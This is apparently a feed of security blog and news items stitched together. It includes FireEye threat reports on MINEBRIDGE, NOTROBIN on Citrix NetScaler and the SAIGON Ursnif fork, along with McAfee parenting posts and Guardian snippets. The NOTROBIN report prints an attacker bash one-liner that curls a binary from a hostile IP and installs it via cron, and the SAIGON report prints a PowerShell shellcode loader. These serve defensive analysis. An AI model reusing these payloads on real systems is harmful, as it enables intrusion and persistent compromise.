The limited overlap in tactics, techniques, and procedures (TTPs) between campaigns delivering MINEBRIDGE and those delivering FRIENDSPEAK may suggest that MINEDOOR is not exclusive to TA505. Recent campaigns delivering FRIENDSPEAK have appeared to use spoofed sender addresses, Excel spreadsheets with embedded payloads, and campaign-specific domains that masquerade as common technology services. Meanwhile, the campaigns delivering MINEBRIDGE have used actor-controlled email addresses, malicious Word documents that download payloads from a remote server, and domains with a variety of themes sometimes registered weeks in advance of the campaign. The campaigns delivering MINEBRIDGE also appear to be significantly smaller in both volume and scope than the campaigns delivering FRIENDSPEAK. Finally, we observed campaigns delivering MINEBRIDGE on Eastern Orthodox Christmas when Russian-speaking actors are commonly inactive; we did not observe campaigns delivering FRIENDSPEAK during the week surrounding the holiday and language resources in the malware may suggest TA505 actors speak Russian.

It is plausible that these campaigns represent a subset of TA505 activity. For example, they may be operations conducted on behalf of a specific client or by a specific member of the broader threat group. Both sets of campaigns used domains that were registered with Eranet and had the registrant location “JL, US” or “Fujian, CN,” however this overlap is less notable because we suspect that TA505 has used domains registered by a service that reuses registrant information.

Post-compromise activity would likely reveal if these campaigns were conducted by TA505 or a second threat group, however, FireEye has not yet observed any instances in which a host has been successfully compromised by MINEBRIDGE. As such, FireEye currently clusters this activity separately from what the public tracks as TA505.


FireEye would like to thank all the dedicated authors of open source tooling and research referenced in this blog post. Further, FireEye would like to thank TeamViewer for their collaboration with us on this matter. The insecure DLL loading highlighted in this blog post was resolved in TeamViewer 11.0.214397, released on October 22, 2019, prior to the TeamViewer team receiving any information from FireEye. Additionally, TeamViewer is working to add further mitigations for the malware’s functionality. FireEye will update this post with further data from TeamViewer when this becomes available.

Indicators of Compromise (IOCs)

Suspicious Behaviors
  • Process lineage: Microsoft Word launching TeamViewer
  • Directory Creation: %APPDATA%\Windows Media Player
  • File Creation:
    • %APPDATA%\Windows Media Player\msi.dll
    • %APPDATA%\Windows Media Player\msi.dll.old
    • %APPDATA%\Windows Media Player\tvdll.cmd
    • %APPDATA%\Windows Media Player\wpvnetwks.exe
    • %APPDATA%\Windows Media Player\TeamViewer_Resource_en.dll
    • %APPDATA%\Windows Media Player\TeamViewer_StaticRes.dll
    • %APPDATA%\Windows Media Player\TeamViewer_Desktop.exe
    • %APPDATA%\Windows Media Player\TeamViewer.ini
    • %CSIDL_STARTUP%\Windows WMI.lnk
    • %CSIDL_PROFILE%\<dll_name>.xpdf
    • %TEMP%\<32 random characters>
    • %TEMP%\<32 random characters>.exe
    • %TEMP%\~8426bcrtv7bdf.bin
  • Network Activity:
    • HTTPS Post requests to C2 URLs
    • User-Agent String: "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B150 Safari/604.1"

C2 Domains

  • 123faster[.]top
  • conversia91[.]top
  • fatoftheland[.]top
  • creatorz123[.]top
  • compilator333[.]top
Download Domains
  • neurogon[.]com
  • tiparcano[.]com
  • seigortan[.]com
  • marendoger[.]com
  • badiconreg[.]com
Sender Domains
  • pt-cpaaccountant[.]com
  • rogervecpa[.]com
  • agent4career[.]com
  • bestrecruitments[.]com
Phishing Documents

































































































































































Spotting Fake News: Teaching Kids to be Responsible Online Publishers

fake news

Editor’s note: This is part II in a series on Fake News. Read part I, here.

Kids today are not equipped to deal with the barrage of digital information coming at them every day. Add to that, the bulk of information that may be fake, misleading, or even malicious. So how do we help kids become more responsible for the content they share online?

We do it one conversation at a time.

When it comes to the mounting influence of fake news, it’s easy to point the finger at the media, special interest groups, politicians, and anyone else with an agenda and internet access. While many of these groups may add to the problem, each one of us plays a role in stopping it.

What’s our role?

We, the connected consumer, now play such a significant role in how content is created and disseminated, that a large part of the solution comes down to individual responsibility — yours and mine.

The shift begins with holding ourselves accountable for every piece of content we read, create, or share online. That shift gains momentum when we equip our kids to do the same.

Teach personal responsibility. Start the conversation around personal responsibility early with your kids and keep it going. Explain that every time we share fake news, a rumor, or poorly sourced material, we become one cog in the wheel of spreading untruths and even malicious fabrications. We become part of the problem. Challenge your child to become a trustworthy, discerning source of information as opposed to being viewed by others as an impulsive, unreliable source.

Discuss the big picture. Fake news or misleading content isn’t just annoying; it’s harmful in a lot of other ways. Misinformation undermines trust, causes division, can spark social unrest, and harm unity. More than that, fake news edges out helpful, factual, content designed to educate and inform.

Be aware of confirmation bias. Confirmation bias is gravitating toward ideas, people, and content that echoes our spiritual, social, political, or moral points of view. Confirmation bias tempts us to disregard information that opposes our ideology. While confirmation bias is part of our human nature, left unchecked, it can be an obstacle to learning factual information.

Chill, don’t spill. Fake news is designed to advance a personal agenda. This is especially true during times of social tension when tempers are running high. Don’t take the emotional bait. Exercise discernment. Before sharing, read legitimate news sources that offer balanced coverage, so the story you share or opinion you express is based on accurate information.

Be a free thinker. Our kids have grown up in a world where ‘like’ and ‘share’ counts somehow equate to credibility. Encourage kids to break away from the crowd and have the courage to be free, independent thinkers.

Challenge content by asking:

  • Do I understand all the points of view of this story?
  • What do I really think about this topic or idea?
  • Am I overly emotional and eager to share this?
  • Am I being manipulated by this content?
  • What if I’m wrong?

Question every source. Studies show that people assume that the higher something ranks in search results, the more factual or trustworthy the information is. Wrong. Algorithms retrieve top content based on keywords, not accuracy. So, dig deeper and verify sources.

5 ways to spot fake news

1. Look closely at the source. Fake news creators are good at what they do. While some content has detectable errors, others are sophisticated and strangely persuasive. So, take a closer look. Test credibility by asking:

  • Where is the information coming from? 
  • Is this piece satire?
  • Is the author of the article, bio, and website legitimate? 
  • Are studies, infographics, and quotes appropriately attributed?
  • Is the URL legitimate (cnn.comvs.
  • Are there red flags such as unknown author, all capital letters, misspellings, or grammar errors?

2. Be discerning with viral content. Often a story will go viral because it’s so unbelievable. So pause before you share. Google the story’s headline to see if the story appears in other reliable publications.

3. Pay attention to publish dates, context. Some viral news items may not be entirely false, just intentionally shared out of context. Fake news creators often pull headlines or stories from the past and present them as current news to fit the desired narrative.

4. Beware of click-bait headlines. A lot of fake news is carefully designed with user behavior in mind. A juicy headline leads to a false news story packed with even more fake links that take you to a product page or, worse, download malware onto your computer, putting your data and privacy at risk. These kinds of fake news scams capitalize on emotional stories such as the recent tragic death of basketball great Kobe Bryant.

5. Verify information. It takes extra effort, but plenty of sites exist that can help you verify a piece of information. Before sharing that a piece of content, check it out on sites like:


While fake news isn’t a new phenomenon, thanks to technology’s amplification power, it’s reached new levels of influence and deception. This social shift makes it imperative to get in front of this family conversation as soon as possible especially since we’re headed into an election year.

The post Spotting Fake News: Teaching Kids to be Responsible Online Publishers appeared first on McAfee Blogs.

Jeff Bezos met FBI investigators in 2019 over alleged Saudi hack

Amazon founder interviewed as FBI conducts inquiry into Israeli firm linked to malware

Jeff Bezos met federal investigators in April 2019 after they received information about the alleged hack of the billionaire’s mobile phone by Saudi Arabia, the Guardian has been told.

Bezos was interviewed by investigators at a time when the FBI was conducting an investigation into the Israeli technology company NSO Group, according to a person who was present at the meeting.

Continue reading...

I’m still on Windows 7 – what should I do?

Support for Windows 7 has ended, leaving Marcy wondering how they can protect themselves

I do a lot of work on a Windows 7 desktop PC that is about five years old. I’m a widow and can’t afford to run out and get a new PC at this time, or pay for Windows 10. If I do stay with Windows 7, what should I worry about, and how can I protect myself? I have been running Kaspersky Total Security for several years, which has worked well so far. Marcy

Microsoft Windows 7 – launched in 2009 – came to the end of its supported life on Tuesday. Despite Microsoft’s repeated warnings to Windows 7 users, there may still be a couple of hundred million users, many of them in businesses. What should people do next?

Continue reading...

404 Exploit Not Found: Vigilante Deploying Mitigation for Citrix NetScaler Vulnerability While Maintaining Backdoor

As noted in Rough Patch: I Promise It'll Be 200 OK, our FireEye Mandiant Incident Response team has been hard at work responding to intrusions stemming from the exploitation of CVE-2019-19781. After analyzing dozens of successful exploitation attempts against Citrix ADCs that did not have the Citrix mitigation steps implemented, we’ve recognized multiple groups of post-exploitation activity. Within these, something caught our eye: one particular threat actor that’s been deploying a previously-unseen payload for which we’ve created the code family NOTROBIN.

Upon gaining access to a vulnerable NetScaler device, this actor cleans up known malware and deploys NOTROBIN to block subsequent exploitation attempts! But all is not as it seems, as NOTROBIN maintains backdoor access for those who know a secret passphrase. FireEye believes that this actor may be quietly collecting access to NetScaler devices for a subsequent campaign.

Initial Compromise

This actor exploits NetScaler devices using CVE-2019-19781 to execute shell commands on the compromised device. They issue an HTTP POST request from a Tor exit node to transmit the payload to the vulnerable CGI script. For example, Figure 1 shows a web server access log entry recording exploitation: - - [12/Jan/2020:21:55:19 -0500] "POST
/vpn/../vpns/portal/scripts/ HTTP/1.1" 304 - "-" "curl/7.67.0"

Figure 1: Web log showing exploitation

Unlike other actors, this actor appears to exploit devices using a single HTTP POST request that results in an HTTP 304 response—there is no observed HTTP GET to invoke staged commands. Unfortunately, we haven’t recovered the POST body contents to see how it works.  In any case, exploitation causes the Bash one liner shown in Figure 2 to run on the compromised system:

pkill -9 netscalerd; rm /var/tmp/netscalerd; mkdir /tmp/.init; curl -k
hxxps://95.179.163[.]186/wp-content/uploads/2018/09/64d4c2d3ee56af4f4ca8171556d50faa -o
/tmp/.init/httpd; chmod 744 /tmp/.init/httpd; echo "* * * * *
/var/nstmp/.nscache/httpd" | crontab -; /tmp/.init/httpd &"

Figure 2: Bash exploit payload

This is the same methodology as described in Rough Patch: I Promise It'll Be 200 OK. The effects of this series of commands includes:

  1. Kill and delete all running instances of netscalerd—a common process name used for cryptocurrency mining utilities deployed to NetScaler devices.
  2. Creates a hidden staging directory /tmp/.init, download NOTROBIN to it, and enable the execute permission.
  3. Install /var/nstmp/.nscache/httpd for persistence via the cron daemon. This is the path to which NOTROBIN will copy itself.
  4. Manually execute NOTROBIN.

There’s a lot to unpack here. Of note, the actor removes malware known to target NetScaler devices via the CVE-2019-19781 vulnerability. Cryptocurrency miners are generally easy to identify—just look for the process utilizing nearly 100% of the CPU. By uninstalling these unwanted utilities, the actor may hope that administrators overlook an obvious compromise of their NetScaler devices.

The actor uses curl to fetch NOTROBIN from the hosting server with IP address 95.179.163[.]186 that appears to be an abandoned WordPress site. FireEye has identified many payloads hosted on this server, each named after their embedded authentication key. Interestingly, we haven’t seen reuse of the same payload across multiple clients. Compartmenting payloads indicates the actor is exercising operational security.

FireEye has recovered cron syslog entries, such as those shown in Figure 3, that confirm the persistent installation of NOTROBIN. Note that these entries appear just after the initial compromise. This is a robust indicator of compromise to triage NetScaler devices.

Jan 12 21:57:00 <> foo.netscaler /usr/sbin/cron[73531]:
(nobody) CMD (/var/nstmp/.nscache/httpd)

Figure 3: cron log entry showing NOTROBIN execution

Now, let’s turn our attention to what NOTROBIN does.

Analysis of NOTROBIN

NOTROBIN is a utility written in Go 1.10 and compiled to a 64-bit ELF binary for BSD systems. It periodically scans for and deletes files matching filename patterns and content characteristics. The purpose seems to be to block exploitation attempts against the CVE-2019-19781 vulnerability; however, FireEye believes that NOTROBIN provides backdoor access to the compromised system.

When executed, NOTROBIN ensures that it is running from the path /var/nstmp/.nscache/httpd. If not, the utility copies itself to this path, spawns the new copy, and then exits itself. This provides detection cover by migrating the process from /tmp/, a suspicious place for long-running processes to execute, to an apparently NetScaler-related, hidden directory.

Now the fun begins: it spawns two routines that periodically check for and delete exploits.

Every second, NOTROBIN searches the directory /netscaler/portal/scripts/ for entries created within the last 14 days and deletes them, unless the filename or file content contains a hardcoded key (example: 64d4c2d3ee56af4f4ca8171556d50faa). Open source reporting indicates that some actors write scripts into this directory after exploiting CVE-2019-19781. Therefore, we believe that this routine cleans the system of publicly known payloads, such as

Eight times per second, NOTROBIN searches for files with an .xml extension in the directory /netscaler/portal/templates/. This is the directory into which exploits for CVE-2019-19781 write templates containing attacker commands. NOTROBIN deletes files that contain either of the strings block or BLOCK, which likely match potential exploit code, such as that found in the ProjectZeroIndia exploit; however, the utility does not delete files with a filename containing the secret key.

FireEye believes that actors deploy NOTROBIN to block exploitation of the CVE-2019-19781 vulnerability while maintaining backdoor access to compromised NetScaler devices. The mitigation works by deleting staged exploit code found within NetScaler templates before it can be invoked. However, when the actor provides the hardcoded key during subsequent exploitation, NOTROBIN does not remove the payload. This lets the actor regain access to the vulnerable device at a later time.

Across multiple investigations, FireEye observed actors deploying NOTROBIN with unique keys. For example, we’ve recovered nearly 100 keys from different binaries. These look like MD5 hashes, though FireEye has been unsuccessful in recovering any plaintext. Using complex, unique keys makes it difficult for third parties, such as competing attackers or FireEye, to easily scan for NetScaler devices “protected” by NOTROBIN. This actor follows a strong password policy!

Based on strings found within NOTROBIN, the actor appears to inject the key into the Go project using source code files named after the key. Figure 4 and Figure 5 show examples of these filenames.


Figure 4: Source filename recovered from NOTROBIN sample


Figure 5: Source filename recovered from NOTROBIN sample

We wonder if “tmpl_ci” refers to a Continuous Integration setup that applies source code templating to inject keys and build NOTROBIN variants. We also hope the actor didn’t have to revert to backups after losing the original source!

Outstanding Questions

NOTROBIN spawns a background routine that listens on UDP port 18634 and receives data; however, it drops the data without inspecting it. You can see this logic in Figure 6. FireEye has not uncovered a purpose for this behavior, though DCSO makes a strong case for this being used as a mutex, as only a single listener can be active on this port.

Figure 6: NOTROBIN logic that drops UDP traffic

There is also an empty function main.install_cron whose implementation has been removed, so alternatively, perhaps these are vestiges of an early version of NOTROBIN. In any case, a NetScaler device listening on UDP port 18634 is a reliable indicator of compromise. Figure 7 shows an example of listing the open file handles on a compromised NetScaler device, including a port listening on UDP 18634.

Figure 7: File handling listing of compromised NetScaler device


During one engagement, FireEye reviewed forensic evidence of NetScaler exploitation attempts against a single device, both before and after NOTROBIN was deployed by an actor. Prior to January 12, before NOTROBIN was installed, we identified successful attacks from multiple actors. But, across the following three days, more than a dozen exploitation attempts were thwarted by NOTROBIN. In other words, NOTROBIN inoculated the vulnerable device from further compromise. For example, Figure 8 shows a log message that records a failed exploitation attempt. - - [13/Jan/2020:05:09:07 -0500] "GET
/vpn/../vpns/portal/wTyaINaDVPaw8rmh.xml HTTP/1.1" 404 48 "-"

Figure 8: Web log entry showing a failed exploitation attempt

Note that the application server responded with HTTP 404 (“Not Found”) as this actor attempts to invoke their payload staged in the template wTyaINaDVPaw8rmh.xml. NOTROBIN deleted the malicious template shortly after it was created – and before it could be used by the other actor.

FireEye has not yet identified if the actor has returned to NOTROBIN backdoors.


FireEye believes that the actor behind NOTROBIN has been opportunistically compromising NetScaler devices, possibly to prepare for an upcoming campaign. They remove other known malware, potentially to avoid detection by administrators that check into their devices after reading Citrix security bulletin CTX267027. NOTROBIN mitigates CVE-2019-19781 on compromised devices but retains a backdoor for an actor with a secret key. While we haven’t seen the actor return, we’re skeptical that they will remain a Robin Hood character protecting the internet from the shadows.

Indicators of Compromise and Discovery

Table 1 lists indicators that match NOTROBIN variants that FireEye has identified. The domain vilarunners[.]cat is the WordPress site that hosted NOTROBIN payloads. The domain resolved to 95.179.163[.]186 during the time of observed activity. As of January 15, the vilarunners[.]cat domain currently resolves to a new IP address of 80.240.31[.]218.

IOC Item


HTTP URL prefix










Crontab entry


Listening UDP port


Remote IP


Remote IP




Table 1: Indicators of Compromise

Discovery on VirusTotal

You can use the following VTI queries to identify NOTROBIN variants on VirusTotal:

  • vhash:"73cee1e8e1c3265c8f836516c53ae042"
  • vhash:"e57a7713cdf89a2f72c6526549d22987"

Note, the vHash implementation is private, so we’re not able to confirm why this technique works. In practice, the vHashes cover the same variants identified by the Yara rule listed in Figure 9.




        author = ""

        date_created = "2020-01-15"


        $func_name_1 = "main.remove_bds"

        $func_name_2 = "main.xrun"


        all of them


Figure 9: Yara rule that matches on NOTROBIN variants

Recovered Authentication Keys

FireEye has identified nearly 100 hardcoded keys from NOTROBIN variants that the actor could use to re-enter compromised environments. We expect that these strings may be found within subsequent exploitation attempts, either as filenames or payload content. Although we won’t publish them here out of concern for our customers, please reach out if you’re looking for NOTROBIN within your environment and we can provide a list.


Thank you to analysts across FireEye that are currently responding to this activity, including Brandan Schondorfer for collecting and interpreting artifacts, Steven Miller for coordinating analysis, Evan Reese for pivoting across intel leads, Chris Glyer for reviewing technical aspects, Moritz Raabe for reverse engineering NOTROBIN samples, and Ashley Frazer for refining the presentation and conclusions.

Microsoft rolls out Windows 10 security fix after NSA warning

US agency revealed flaw that could be exploited by hackers to create malicious software

Microsoft is rolling out a security fix to Windows 10 after the US National Security Agency (NSA) warned the popular operating system contained a highly dangerous flaw that could be used by hackers. Reporting the vulnerability represents a departure for the NSA from its past strategy of keeping security flaws under wraps to exploit for its own intelligence needs.

The NSA revealed during a press conference on Tuesday that the “serious vulnerability” could be used to create malicious software that appeared to be legitimate. The flaw “makes trust vulnerable”, the NSA director of cybersecurity, Anne Neuberger, said in a briefing call to media on Tuesday.

Related: Skype audio graded by workers in China with 'no security measures'

Continue reading...

Less is More: 5 Ways to Jumpstart a ‘Digital Minimalist’ Mindset  

digital minimalism

Editor’s Note: This is part II of a series on Digital Minimalism in 2020.

Is this the year you rethink and rebuild your relationship with technology? If so, embracing digital minimalism may be the most powerful way to achieve that goal.

We learned last week in our first post on this series tht digital minimalism isn’t about chucking your devices and going off the grid. It’s about being hyper intentional that your technology choices support the things you value.

And, as outlined by Cal Newport in his book, Digital Minimalism: Choosing a Focused Life in a Noisy World, the first step in the process is clarifying your values. Your values are the guiding principles that motivate you and give your life meaning such as family, education, work/life balance, community service, friendship, integrity, health, or wealth. With values clearly defined, you can evaluate every piece of technology, app, or social network you use to be sure it aligns with those values.

For instance, if you establish your top values to be family and volunteering, then maybe it’s time to let go of all the podcasts, apps, and email subscriptions that no longer support those priorities. The online social communities you habitually peruse may trigger anxiety and be taking time from activities that could be far more fulfilling.

If you get overwhelmed amid your technology pruning, come back to these two critical questions:

  • Does this technology directly support something that I deeply value?
  • Is this technology the best way to support this value?

digital minimalism



There’s a ton of great information as well as passion online around the concept of digital minimalism. But to keep this new idea “minimal” and easy to grasp, we’ve chosen 5 things you can do today to help you and your family jumpstart this new way of thinking.

5 ways to jumpstart a ‘digital minimalist’ mindset

  1. Make social accounts private. Last week we suggested cutting all non-essential media for 30 days. Another way to mentally shift into a minimalist mindset is to transition your social media accounts from public to private if you haven’t already. Not only will this small change increase your online privacy, but it could also help you become more aware of the amount of content you share, the people with whom you share it, and the value of what you share. For people who post frequently (and often out of habit), this may prove to be a game-changer. The goal of digital minimalism isn’t a digital detox or white-knuckling no-or-less-tech life. The goal is to consciously, willingly, and consistently be rebuilding your relationship with technology into a formula that decreases distraction and increases value.
  2. Audit those apps! Want to feel a rush of minimalist adrenaline? Whack some apps! Most of us have amassed a galaxy of apps on our phones, tablets, and laptops. Newport suggests getting rid of any apps or devices that continuously distract and are “outside of work.” Those brain games, cooking apps, calorie trackers, and delivery apps you rarely use or value, may no longer be relevant to your values. Some will find this exercise exhilarating, while others may feel panicked. If that’s the case, pace yourself and delete a handful of apps over the next few weeks. The goal is more peace, not panic. On a security note: Remember, apps are one of the main channels for malware. Consider adding security software to your family devices, reading app reviews, and only downloading trusted products.
  3. Reclaim your space. Do you carry your phone with you into restaurants, upstairs, on a walk, and even to the bathroom? If so, this step may be especially tricky but incredibly beneficial. Think about it — you weren’t born with a phone. Over the years, it became a companion, maybe even an extra appendage. So start small to reclaim your birthright to phone-free space. If you go outside to walk your dog, leave your phone inside. Are you headed into a restaurant? Leave the phone in the car. Newport also suggests leaving your phone in a fixed spot in your home and treating it like the “house phones” of the past. When you go to bed, leave your phone in another room. Over time, hopefully, these small changes will add more hours, sleep, relaxation, conversation, and contemplation to your day.
  4. Condense home screens, turn off all notifications. Clutter — especially digital clutter — can trigger feelings of chaos and anxiety. By creating folders for random files and apps on your laptop, tablet, and phone, you can declutter and breathe a little easier. If later you can’t find a document, use the search tool on your device. Also, turn off all notifications, including your phone ringer, to reduce interruptions and to avoid the temptation to phub (phone snub) the person in front of you.
  5. Replace device time with more productive activities. The pain and regret of the social media time suck are very real. We lose days, even years going down digital rabbit holes and getting emotionally invested in random social media posts and exchanges. Some ideas: If you are a night scroller, opt to read a physical book. If you take breaks to scroll during work hours, put your phone in a drawer — out of sight, out of mind. If you’ve defined “relaxing” as curling up with your coffee and phone and reading through social feeds, reclaim those hours by calling a friend, taking a walk, connecting with your family, reading, or getting outside.

Embracing a new mindset, especially when it comes to our sacred technology habits, won’t be an easy task. However, if you know (and yes, you do know) that technology is taking up too much of your time, attention, and emotional bandwidth, then 2020 may the perfect time to release digital distractions, rethink your technology choices, and reclaim the things that matter most.

The post Less is More: 5 Ways to Jumpstart a ‘Digital Minimalist’ Mindset   appeared first on McAfee Blogs.

SAIGON, the Mysterious Ursnif Fork

Ursnif (aka Gozi/Gozi-ISFB) is one of the oldest banking malware families still in active distribution. While the first major version of Ursnif was identified in 2006, several subsequent versions have been released in large part due source code leaks. FireEye reported on a previously unidentified variant of the Ursnif malware family to our threat intelligence subscribers in September 2019 after identification of a server that hosted a collection of tools, which included multiple point-of-sale malware families. This malware self-identified as "SaiGon version 3.50 rev 132," and our analysis suggests it is likely based on the source code of the v3 (RM3) variant of Ursnif. Notably, rather than being a full-fledged banking malware, SAIGON's capabilities suggest it is a more generic backdoor, perhaps tailored for use in targeted cybercrime operations.

Technical Analysis


SAIGON appears on an infected computer as a Base64-encoded shellcode blob stored in a registry key, which is launched using PowerShell via a scheduled task. As with other Ursnif variants, the main component of the malware is a DLL file. This DLL has a single exported function, DllRegisterServer, which is an unused empty function. All the relevant functionality of the malware executes when the DLL is loaded and initialized via its entry point.

Upon initial execution, the malware generates a machine ID using the creation timestamp of either %SystemDrive%\pagefile.sys or %SystemDrive%\hiberfil.sys (whichever is identified first). Interestingly, the system drive is queried in a somewhat uncommon way, directly from the KUSER_SHARED_DATA structure (via SharedUserData→NtSystemRoot). KUSER_SHARED_DATA is a structure located in a special part of kernel memory that is mapped into the memory space of all user-mode processes (thus shared), and always located at a fixed memory address (0x7ffe0000, pointed to by the SharedUserData symbol).

The code then looks for the current shell process by using a call to GetWindowThreadProcessId(GetShellWindow(), …). The code also features a special check; if the checksum calculated from the name of the shell's parent process matches the checksum of explorer.exe (0xc3c07cf0), it will attempt to inject into the parent process instead.

SAIGON then injects into this process using the classic VirtualAllocEx / WriteProcessMemory / CreateRemoteThread combination of functions. Once this process is injected, it loads two embedded files from within its binary:

  • A PUBLIC.KEY file, which is used to verify and decrypt other embedded files and data coming from the malware's command and control (C2) server
  • A RUN.PS1 file, which is a PowerShell loader script template that contains a "@SOURCE@" placeholder within the script:

$hanksefksgu = [System.Convert]::FromBase64String("@SOURCE@");
Invoke-Expression ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("JHdneG1qZ2J4dGo9JGh

The malware replaces the "@SOURCE@" placeholder from this PowerShell script template with a Base64-encoded version of itself, and writes the PowerShell script to a registry value named "PsRun" under the "HKEY_CURRENT_USER\Identities\{<random_guid>}" registry key (Figure 1).

Figure 1: PowerShell script written to PsRun

The instance of SAIGON then creates a new scheduled task (Figure 2) with the name "Power<random_word>" (e.g. PowerSgs). If this is unsuccessful for any reason, it falls back to using the "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" registry key to enable itself to maintain persistence through system reboot.

Figure 2: Scheduled task

Regardless of the persistence mechanism used, the command that executes the binary from the registry is similar to the following:


After removing the Base64 encoding from this command, it looks something like "iex (gp 'HKCU:\\Identities\\{43B95E5B-D218-0AB8-5D7F-2C789C59B1DF}').PsRun."  When executed, this command retrieves the contents of the previous registry value using Get-ItemProperty (gp) and executes it using Invoke-Expression (iex).

Finally, the PowerShell code in the registry allocates a block of memory, copies the Base64-decoded shellcode blob into it, launches a new thread pointing to the area using CreateRemoteThread, and waits for the thread to complete. The following script is a deobfuscated and beautified version of the PowerShell.

$hanksefksgu = [System.Convert]::FromBase64String("@SOURCE@");
$wgxmjgbxtj = $hanksefksgu.Length;

$tskvo = @"
public static extern Int32 GetCurrentProcess();

public static extern IntPtr GetDC(IntPtr mxxahxof);

public static extern IntPtr CreateRemoteThread(IntPtr hcwylrbs, IntPtr wqer, uint sfj, IntPtr wllev, IntPtr wwdrictwdk, uint klmhnsk, IntPtr vcexsualwhh);

public static extern UInt32 WaitForSingleObject(IntPtr aj, UInt32 kdxsxev);

public static extern IntPtr VirtualAlloc(IntPtr xy, uint knbt, uint tmrywhu, uint wgutud);

$tskaaxotxe = Add-Type -memberDefinition $tskvo -Name 'Win32' -namespace Win32Functions -passthru;
$mhxkpull = $tskaaxotxe::VirtualAlloc(0, $wgxmjgbxtj, 0x3000, 0x40);[System.Runtime.InteropServices.Marshal]::Copy($hanksefksgu, 0, $mhxkpull, $wgxmjgbxtj);
$tdocnnwkvoq = $tskaaxotxe::CreateRemoteThread(-1, 0, 0, $mhxkpull, $mhxkpull, 0, 0);
$ocxxjmhiym = $tskaaxotxe::WaitForSingleObject($tdocnnwkvoq, 30000);

Once it has established a foothold on the machine, SAIGON loads and parses its embedded LOADER.INI configuration (see the Configuration section for details) and starts its main worker thread, which continuously polls the C2 server for commands.


The Ursnif source code incorporated a concept referred to as "joined data," which is a set of compressed/encrypted files bundled with the executable file. Early variants relied on a special structure after the PE header and marked with specific magic bytes ("JF," "FJ," "J1," "JJ," depending on the Ursnif version). In Ursnif v3 (Figure 3), this data is no longer simply after the PE header but pointed to by the Security Directory in the PE header, and the magic bytes have also been changed to "WD" (0x4457).

Figure 3: Ursnif v3 joined data

This structure defines the various properties (offset, size, and type) of the bundled files. This is the same exact method used by SAIGON for storing its three embedded files:

  • PUBLIC.KEY - RSA public key
  • RUN.PS1 - PowerShell script template
  • LOADER.INI - Malware configuration

The following is a list of configuration options observed:

Name Checksum





List of C2 URLs used for communication



Serpent key used for communicating with the C2



Botnet ID



Number of seconds to wait before the initial request to the C2



Waits until the uptime is greater than this value (in seconds)



Number of seconds to wait between subsequent requests to the C2



The number of minutes to wait before switching to the next C2 server in case of failures

Table 1: Configuration options


While the network communication structure of SAIGON is very similar to Ursnif v3, there are some subtle differences. SAIGON beacons are sent to the C2 servers as multipart/form-data encoded requests via HTTP POST to the "/index.html" URL path. The payload to be sent is first encrypted using Serpent encryption (in ECB mode vs CBC mode), then Base64-encoded. Responses from the server are encrypted with the same Serpent key and signed with the server's RSA private key.

SAIGON uses the following User-Agent header in its HTTP requests: "Mozilla/5.0 (Windows NT <os_version>; rv:58.0) Gecko/20100101 Firefox/58.0," where <os_version> consists of the operating system's major and minor version number (e.g. 10.0 on Windows 10, and 6.1 on Windows 7) and the string "; Win64; x64" is appended when the operating system is 64-bit. This yields the following example User Agent strings:

  • "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0" on Windows 10 64-bit
  • "Mozilla/5.0 (Windows NT 6.1; rv:58.0) Gecko/20100101 Firefox/58.0" on Windows 7 32-bit

The request format is also somewhat similar to the one used by other Ursnif variants described in Table 2:





Bot version (unlike other Ursnif variants this only contains the build number, so only the xxx digits from "")


Botnet ID


Client ID


Request type (0 – when polling for tasks, 6 – for system info data uploads)


Machine uptime in seconds


The bot "knock" period (number of seconds to wait between subsequent requests to the C2, see the LoadPeriod configuration option)

Table 2: Request format components


SAIGON implements the bot commands described in Table 3.

Name Checksum





Uninstalls itself from the machine; removes scheduled task and deletes its registry key



Download data from URL, decrypt and verify signature, save it as a .ps1 file and run it using "PowerShell.exe -ep unrestricted -file %s"



Collects and uploads system information by running:

  1. "systeminfo.exe"
  2. "net view"
  3. "nslookup"
  4. "tasklist.exe /SVC"
  5. "driverquery.exe"
  6. "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s"



Download data from URL, decrypt and verify, then use the same shellcode loader that was used to load itself into memory to load the DLL into the current process



Download data from URL, decrypt and verify, save with an .exe extension, invoke using ShellExecute

Table 3: SAIGON bot commands

Comparison to Ursnif v3

Table 4 shows the similarities between Ursnif v3 and the analyzed SAIGON samples (differences are highlighted in bold):


Ursnif v3 (RM3)

Saigon (Ursnif v3.5?)

Persistence method

Scheduled task that executes code stored in a registry key using PowerShell

Scheduled task that executes code stored in a registry key using PowerShell

Configuration storage

Security PE directory points to embedded binary data starting with 'WD' magic bytes (aka. Ursnif "joined files")

Security PE directory points to embedded binary data starting with 'WD' magic bytes (aka. Ursnif "joined files")

PRNG algorithm



Checksum algorithm

JAMCRC (aka. CRC32 with all the bits flipped)

CRC32, with the result rotated to the right by 1 bit

Data compression




Serpent CBC

Serpent ECB

Data integrity verification

RSA signature

RSA signature

Communication method

HTTP POST requests

HTTP POST requests

Payload encoding

Unpadded Base64 ('+' and '/' are replaced with '_2B' and '_2F' respectively), random slashes are added

Unpadded Base64 ('+' and '/' are replaced with '%2B' and '%2F' respectively), no random slashes

Uses URL path mimicking?



Uses PX file format?



Table 4: Similarities and differences between Ursnif v3 and SAIGON samples

Figure 4 shows Ursnif v3's use of URL path mimicking. This tactic has not been seen in other Ursnif variants, including SAIGON.

Figure 4: Ursnif v3 mimicking (red) previously seen benign browser traffic (green) not seen in SAIGON samples 


It is currently unclear whether SAIGON is representative of a broader evolution in the Ursnif malware ecosystem. The low number of SAIGON samples identified thus far—all of which have compilations timestamps in 2018—may suggest that SAIGON was a temporary branch of Ursnif v3 adapted for use in a small number of operations. Notably, SAIGON’s capabilities also distinguish it from typical banking malware and may be more suited toward supporting targeted intrusion operations. This is further supported via our prior identification of SAIGON on a server that hosted tools used in point-of-sale intrusion operations as well as VISA’s recent notification of the malware appearing on a compromised hospitality organization’s network along with tools previously used by FIN8.


The authors would like to thank Kimberly Goody, Jeremy Kennelly and James Wyke for their support on this blog post.

Appendix A: Samples

The following is a list of samples including their embedded configuration:

Sample SHA256: 8ded07a67e779b3d67f362a9591cce225a7198d2b86ec28bbc3e4ee9249da8a5
Sample Version: 3.50.132
PE Timestamp: 2018-07-07T14:51:30
